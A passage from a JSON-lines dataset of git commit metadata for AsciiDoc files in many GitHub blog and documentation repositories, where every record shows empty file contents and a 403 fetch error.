'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51ed9532f4cf476e4c7d34ed0f63bfe90defdb70","subject":"Update 2016-07-20-Latency-for-a-set-Throughput.adoc","message":"Update 
2016-07-20-Latency-for-a-set-Throughput.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-07-20-Latency-for-a-set-Throughput.adoc","new_file":"_posts\/2016-07-20-Latency-for-a-set-Throughput.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fd8b66c57296ea0a8f93b7dcc9ae5b4d83618dc","subject":"Update 2017-07-28-mecab.adoc","message":"Update 2017-07-28-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-mecab.adoc","new_file":"_posts\/2017-07-28-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60deddd5880a92fd66332fd1ed5f27893e5c7ed6","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85c95af7cc12f9bc0623473e586bd5a596170e4d","subject":"added a paragraph on signing","message":"added a paragraph on signing\n","repos":"markllama\/Fedora-rktfiles,markllama\/Fedora-rktfiles","old_file":"bashtest\/README.adoc","new_file":"bashtest\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/Fedora-rktfiles.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da3c3fef15025616d22557efad53e93c98a9aeb1","subject":"Publish 2016-12-1-There-was-a-keynote-lecture.adoc","message":"Publish 2016-12-1-There-was-a-keynote-lecture.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"484a697093e8dfae091a85a5a9f6d3406e2e3ee9","subject":"Update 2018-02-27-When-the-RTFM-sucks.adoc","message":"Update 2018-02-27-When-the-RTFM-sucks.adoc","repos":"costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io","old_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/costalfy\/costalfy.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d44528c6154b48006e8518b113941dec213224c","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8722f8d586a550b4683e5b168084f4cf0f2a4ec","subject":"Update 2015-04-20-Git-Introduction.adoc","message":"Update 2015-04-20-Git-Introduction.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-04-20-Git-Introduction.adoc","new_file":"_posts\/2015-04-20-Git-Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20a97a4a5d23515d040a2264625e8bf71a3db0f0","subject":"Update 2016-06-18-Non-secure-icons.adoc","message":"Update 2016-06-18-Non-secure-icons.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fdeb242b47980833a4ac3b2e3c26b4c5fc439cc","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b09879601b8e375d0a8e77cc929a4ae8d41dc4b","subject":"Update 2016-12-30-Kleptography-in-RSA.adoc","message":"Update 2016-12-30-Kleptography-in-RSA.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3182b03de1620342dc78470c04ceea23db62cd43","subject":"Update 2017-02-17-First-Hubpress-Blog.adoc","message":"Update 
2017-02-17-First-Hubpress-Blog.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-02-17-First-Hubpress-Blog.adoc","new_file":"_posts\/2017-02-17-First-Hubpress-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"707321d071df213bda93ec1f72cfc9f71be8c7d1","subject":"RHDEVDOCS-3304 Document default pipelines SA","message":"RHDEVDOCS-3304 Document default pipelines SA\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/3304-delete-later.adoc","new_file":"modules\/3304-delete-later.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b4f3e04e462c690a9f7591bbe0058473f63103d","subject":"Update 2017-03-10-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc030c10ab04f001ee9c2b2c0f59de7993434dba","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d594b2228c4744506ddcb433bae14d5cc219814","subject":"Update 2016-06-22-Episode-61-U-and-I-Gotta-Talk.adoc","message":"Update 2016-06-22-Episode-61-U-and-I-Gotta-Talk.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-06-22-Episode-61-U-and-I-Gotta-Talk.adoc","new_file":"_posts\/2016-06-22-Episode-61-U-and-I-Gotta-Talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be56dcd5adb960ae46f8b8ce7b7180afeb0f251f","subject":"CAMEL-14738 - Added pages for website after regen","message":"CAMEL-14738 - Added pages for website after 
regen\n","repos":"nikhilvibhav\/camel,alvinkwekel\/camel,pmoerenhout\/camel,nicolaferraro\/camel,tdiesler\/camel,adessaigne\/camel,zregvart\/camel,DariusX\/camel,cunningt\/camel,tdiesler\/camel,DariusX\/camel,cunningt\/camel,apache\/camel,adessaigne\/camel,pax95\/camel,mcollovati\/camel,apache\/camel,tadayosi\/camel,nikhilvibhav\/camel,ullgren\/camel,christophd\/camel,pmoerenhout\/camel,pax95\/camel,apache\/camel,christophd\/camel,adessaigne\/camel,tadayosi\/camel,pax95\/camel,adessaigne\/camel,zregvart\/camel,pax95\/camel,tadayosi\/camel,ullgren\/camel,apache\/camel,zregvart\/camel,nikhilvibhav\/camel,christophd\/camel,adessaigne\/camel,alvinkwekel\/camel,ullgren\/camel,christophd\/camel,cunningt\/camel,ullgren\/camel,gnodet\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tdiesler\/camel,alvinkwekel\/camel,cunningt\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,tdiesler\/camel,gnodet\/camel,pax95\/camel,nicolaferraro\/camel,apache\/camel,tdiesler\/camel,DariusX\/camel,christophd\/camel,gnodet\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,alvinkwekel\/camel,zregvart\/camel,pmoerenhout\/camel,nicolaferraro\/camel,cunningt\/camel,tadayosi\/camel,pmoerenhout\/camel,DariusX\/camel,gnodet\/camel,tdiesler\/camel,pax95\/camel,adessaigne\/camel,mcollovati\/camel,mcollovati\/camel,mcollovati\/camel,tadayosi\/camel,gnodet\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/platform-http-vertx.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/platform-http-vertx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5fad35f3430c758e8fc2499ff0193045d6cff120","subject":"Document preview features that are available","message":"Document preview features that are available\n\nThis page lists the features that are currently enabled by turning on `experimentalFeatures`.\r\nIt does not yet provide any details on how these features should be enabled.","repos":"blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,lsmaira\/gradle,robinverduijn\/gradle,blindpirate\/gradle,lsmaira\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,lsmaira\/gradle,lsmaira\/gradle,blindpirate\/gradle,lsmaira\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,lsmaira\/gradle,lsmaira\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,lsmaira\/gradle,lsmaira\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,lsmaira\/gradle","old_file":"subprojects\/dependency-management\/preview-features.adoc","new_file":"subprojects\/dependency-management\/preview-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robinverduijn\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57300181612aa599c0d55f84497570823aee10bf","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/03\/04\/deref.adoc","new_file":"content\/news\/2022\/03\/04\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2fc36ec637866db0bb6271c911907a32183c8a5d","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edf0b797286dd5cce7d94b3a663c9cf842e867c7","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a93754ab042e8fbfd5b64139cab8be0a521ee3c","subject":"y2b create post More Giveaways! + iPod Touch Winner","message":"y2b create post More Giveaways! + iPod Touch Winner","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-24-More-Giveaways--iPod-Touch-Winner.adoc","new_file":"_posts\/2011-08-24-More-Giveaways--iPod-Touch-Winner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1db525487bc633f736817968af06366cd195d6e","subject":"Update 2015-11-17-Expresiones-negativas-en-comandos.adoc","message":"Update 2015-11-17-Expresiones-negativas-en-comandos.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-17-Expresiones-negativas-en-comandos.adoc","new_file":"_posts\/2015-11-17-Expresiones-negativas-en-comandos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d20f3306f5348f70051fb9acba5c2fbfca7679d","subject":"Create 2014-08-29-forge-2.8.1.final.asciidoc","message":"Create 2014-08-29-forge-2.8.1.final.asciidoc","repos":"luiz158\/docs,luiz158\/docs,addonis1990\/docs,agoncal\/docs,addonis1990\/docs,agoncal\/docs,forge\/docs,forge\/docs","old_file":"news\/2014-08-29-forge-2.8.1.final.asciidoc","new_file":"news\/2014-08-29-forge-2.8.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a6b3ae3b979c9cdecc33d6090ea4faf5fae04f1b","subject":"Added Forge 3.0.0.Beta2 announcement","message":"Added Forge 
3.0.0.Beta2 announcement\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-01-18-forge-3.0.0.beta2.asciidoc","new_file":"news\/2016-01-18-forge-3.0.0.beta2.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"4b71c7e2f955f30f96e986ff8564f81c7fb7307e","subject":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","message":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a099e85e20f0b104d092b03168c2bdf5f892aeb8","subject":"docs: fix Spark example to provide partitioning","message":"docs: fix Spark example to provide partitioning\n\nChange-Id: I23f720d8502bbb01c544aa8f2b0978ba0f147c7d\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6085\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu","old_file":"docs\/developing.adoc","new_file":"docs\/developing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b3c8c608206d0b9d023f7a0044b68509284d423","subject":"update endpoint doc","message":"update endpoint doc\n","repos":"Kronos-Integration\/kronos-step","old_file":"doc\/endpoint-interface.adoc","new_file":"doc\/endpoint-interface.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kronos-Integration\/kronos-step.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d2a76fb502360974acaff387d1ad02180412a526","subject":"Working progress on tpenqueue.adoc doc","message":"Working progress on tpenqueue.adoc doc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/api\/xatmi\/tpenqueue.adoc","new_file":"doc\/api\/xatmi\/tpenqueue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c0683e377a9e570539ce02f99509b9fba9ebfafe","subject":"Added a description of the 'options' field 
of the reporter structure and exemplifying with the TextReporterOptions","message":"Added a description of the 'options' field of the reporter structure and exemplifying with the TextReporterOptions\n","repos":"cgreen-devs\/cgreen,thoni56\/cgreen,matthargett\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,matthargett\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,matthargett\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,thoni56\/cgreen,matthargett\/cgreen,matthargett\/cgreen,cgreen-devs\/cgreen","old_file":"doc\/cgreen-guide-en.asciidoc","new_file":"doc\/cgreen-guide-en.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thoni56\/cgreen.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"59d67782a9bdb102565a42434f888753c8ea654f","subject":"Update 2016-04-11-Buffer-Overflow-basico.adoc","message":"Update 2016-04-11-Buffer-Overflow-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"905797371914fcee9a15a6cbafb33a130b12115e","subject":"Add a redirect page for the old documentations","message":"Add a redirect page for the old documentations\n","repos":"robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/cpp_plugins.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/cpp_plugins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robinverduijn\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"21c541a39b55430e16415966ac28e6acf57991cf","subject":"Update 2017-02-12-test-post2.adoc","message":"Update 2017-02-12-test-post2.adoc","repos":"osada9000\/osada9000.github.io,osada9000\/osada9000.github.io,osada9000\/osada9000.github.io,osada9000\/osada9000.github.io","old_file":"_posts\/2017-02-12-test-post2.adoc","new_file":"_posts\/2017-02-12-test-post2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/osada9000\/osada9000.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b3e0df8ed42d006f53888e0d30f87286f20c3bb","subject":"Publish 2016-1-1-Puzzle-8-Matrix.adoc","message":"Publish 
2016-1-1-Puzzle-8-Matrix.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2016-1-1-Puzzle-8-Matrix.adoc","new_file":"2016-1-1-Puzzle-8-Matrix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"149f55136fee93f625ee8ba65ffb3ddfd971d276","subject":"Update 2016-04-18-First-Blog.adoc","message":"Update 2016-04-18-First-Blog.adoc","repos":"birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io","old_file":"_posts\/2016-04-18-First-Blog.adoc","new_file":"_posts\/2016-04-18-First-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/birvajoshi\/birvajoshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7f02278d8c1f892f5362f403ce627b5701595d4","subject":"Update 2016-08-18-2016-08-17.adoc","message":"Update 2016-08-18-2016-08-17.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-18-2016-08-17.adoc","new_file":"_posts\/2016-08-18-2016-08-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6b878e9ae815fd2ea377b4597314cd16e6a9f26","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0645979a10f2e47a9ba915864afed5db366072a","subject":"Update 2019-08-24-Code-snips.adoc","message":"Update 2019-08-24-Code-snips.adoc","repos":"ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io","old_file":"_posts\/2019-08-24-Code-snips.adoc","new_file":"_posts\/2019-08-24-Code-snips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ImpossibleBlog\/impossibleblog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2ba6f49663f22a219f5b247bd9686bee9ef30c4","subject":"create post DON'T Buy The Google Pixel Buds","message":"create post DON'T Buy The Google Pixel 
Buds","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-DONT-Buy-The-Google-Pixel-Buds.adoc","new_file":"_posts\/2018-02-26-DONT-Buy-The-Google-Pixel-Buds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b6782ff20314a17f532c63f015ac56858188d56","subject":"Publish 2015-09-2-Daisies-arent-roses.adoc","message":"Publish 2015-09-2-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"2015-09-2-Daisies-arent-roses.adoc","new_file":"2015-09-2-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00a496a1df0ac545afc4513340bbb82568fbebcc","subject":"Publish 2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","message":"Publish 